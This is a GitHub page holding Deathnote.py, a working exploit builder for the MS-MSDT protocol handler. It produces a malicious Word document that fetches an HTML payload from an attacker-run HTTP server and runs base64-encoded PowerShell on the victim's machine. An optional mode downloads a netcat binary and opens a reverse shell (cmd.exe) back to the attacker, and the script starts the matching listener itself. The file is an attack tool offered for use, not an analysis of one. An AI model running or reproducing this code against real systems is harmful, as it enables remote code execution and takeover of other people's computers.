-
-
Notifications
You must be signed in to change notification settings - Fork 7
/
Deathnote.py
162 lines (132 loc) · 4.95 KB
/
Deathnote.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
#!/usr/bin/env python3
import argparse
import zipfile
import tempfile
import shutil
import os
import netifaces
import ipaddress
import random
import base64
import http.server
import socketserver
import string
import socket
import threading
parser = argparse.ArgumentParser()
parser.add_argument(
"--command",
"-c",
default="notepad",
help="command to run on the target (default: notepad)",
)
parser.add_argument(
"--output",
"-o",
default="./Deathnote.doc",
help="output maldoc file (default: ./Deathnote.doc)",
)
parser.add_argument(
"--interface",
"-i",
default="eth0",
help="network interface or IP address to host the HTTP server (default: eth0)",
)
parser.add_argument(
"--port",
"-p",
type=int,
default="8000",
help="port to serve the HTTP server (default: 8000)",
)
parser.add_argument(
"--reverse",
"-r",
type=int,
default="0",
help="port to serve reverse shell on",
)
def main(args):
# Parse the supplied interface
# This is done so the maldoc knows what to reach out to.
try:
serve_host = ipaddress.IPv4Address(args.interface)
except ipaddress.AddressValueError:
try:
serve_host = netifaces.ifaddresses(args.interface)[netifaces.AF_INET][0][
"addr"
]
except ValueError:
print(
"[!] error detering http hosting address. did you provide an interface or ip?"
)
exit()
# Copy the Microsoft Word skeleton into a temporary staging folder
doc_suffix = "doc"
staging_dir = os.path.join(
tempfile._get_default_tempdir(), next(tempfile._get_candidate_names())
)
doc_path = os.path.join(staging_dir, doc_suffix)
shutil.copytree(doc_suffix, os.path.join(staging_dir, doc_path))
print(f"[+] copied staging doc {staging_dir}")
# Prepare a temporary HTTP server location
serve_path = os.path.join(staging_dir, "www")
os.makedirs(serve_path)
# Modify the Word skeleton to include our HTTP server
document_rels_path = os.path.join(
staging_dir, doc_suffix, "word", "_rels", "document.xml.rels"
)
with open(document_rels_path) as filp:
external_referral = filp.read()
external_referral = external_referral.replace(
"{staged_html}", f"http://{serve_host}:{args.port}/index.html"
)
with open(document_rels_path, "w") as filp:
filp.write(external_referral)
# Rebuild the original office file
shutil.make_archive(args.output, "zip", doc_path)
os.rename(args.output + ".zip", args.output)
print(f"[+] created maldoc {args.output}")
command = args.command
if args.reverse:
command = f"""Invoke-WebRequest https://github.com/Malwareman007/Deathnote/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
# Base64 encode our command so whitespace is respected
base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")
# Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
html_payload += (
"".join([random.choice(string.ascii_lowercase) for _ in range(4096)])
+ "\n</script>"
)
# Create our HTML endpoint
with open(os.path.join(serve_path, "index.html"), "w") as filp:
filp.write(html_payload)
class ReuseTCPServer(socketserver.TCPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class Handler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, directory=serve_path, **kwargs)
def log_message(self, format, *func_args):
if args.reverse:
return
else:
super().log_message(format, *func_args)
def log_request(self, format, *func_args):
if args.reverse:
return
else:
super().log_request(format, *func_args)
def serve_http():
with ReuseTCPServer(("", args.port), Handler) as httpd:
httpd.serve_forever()
# Host the HTTP server on all interfaces
print(f"[+] serving html payload on :{args.port}")
if args.reverse:
t = threading.Thread(target=serve_http, args=())
t.start()
print(f"[+] starting 'nc -lvnp {args.reverse}' ")
os.system(f"nc -lnvp {args.reverse}")
else:
serve_http()